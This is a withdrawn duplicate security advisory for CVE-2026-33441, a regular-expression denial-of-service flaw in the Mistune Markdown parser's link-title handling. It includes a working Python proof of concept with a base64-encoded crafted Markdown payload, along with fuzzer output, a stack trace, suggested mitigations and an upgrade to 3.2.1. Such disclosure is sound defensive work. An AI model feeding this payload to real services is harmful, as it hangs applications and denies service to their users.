CVE-2026-33441
Duplicate Advisory: Mistune has a ReDoS in LINK_TITLE_RE that allows denial of service via crafted Markdown input
Description
### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-8mp2-v27r-99xp. This link is maintained to preserve external references. ### Original Description ### Summary **Denial-of-Service (DoS)** vulnerability in the Mistune Markdown parser. The issue occurs when processing specially crafted reference links, which can cause excessive parsing and CPU consumption, leading to application hangs. **Function affected:** parse_link_title() in helpers.py **Issue:** Malformed reference links cause excessive backtracking and parsing loops. **Impact:** Remote attackers can submit malicious Markdown to hang processes, causing service unavailability. ### Details ``` Name: mistune Version: 3.2.0 Python version: Python 3.13.9 PIP version: pip 25.2 OS: Kali-linux-VERSION="2025.4" ``` ### PoC ``` import mistune import base64 print("Exploit started....!") data = base64.b64decode( "WX5Efn5+RH5+fkRbIVt6XQoKW3q7XTpdOgoifn5+RFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcflt+RFshW3pdCgpbeg==" ) mistune.html(data.decode("utf-8", errors="ignore")) ``` ### Reproduce steps: Simply execute above python script it will hang & increase cpu utilization to 100% **Fuzzer Output (libFuzzer):** ``` ERROR: libFuzzer: timeout after 3 seconds SUMMARY: libFuzzer: timeout ``` **Stack Trace (Excerpt):** ``` mistune/helpers.py:170 in parse_link_title mistune/block_parser.py:259 in parse_ref_link mistune/core.py:216 in parse_method mistune/block_parser.py:458 in parse mistune/markdown.py:93 in parse mistune/markdown.py:120 in __call__ ``` ### IMAGE POC: <img width="1194" height="728" alt="POC" src="https://github.com/user-attachments/assets/009e836f-fff7-439e-b0be-6e889bed0077" /> ### Impact: Denial-of-Service (DoS) High CPU usage and application hang Potential for service unavailability in web apps or APIs processing untrusted Markdown ### Suggested Mitigations: Implement parsing depth and iteration limits. Limit reference-link title length. Detects excessive escape character sequences. Add defensive checks in parse_link_title. Add fuzz regression tests using the provided PoC. This vulnerability was discovered using coverage-guided fuzzing and is reproducible consistently.
How to fix CVE-2026-33441
To remediate CVE-2026-33441, upgrade the affected package to a fixed version below.
- —upgrade to 3.2.1 or later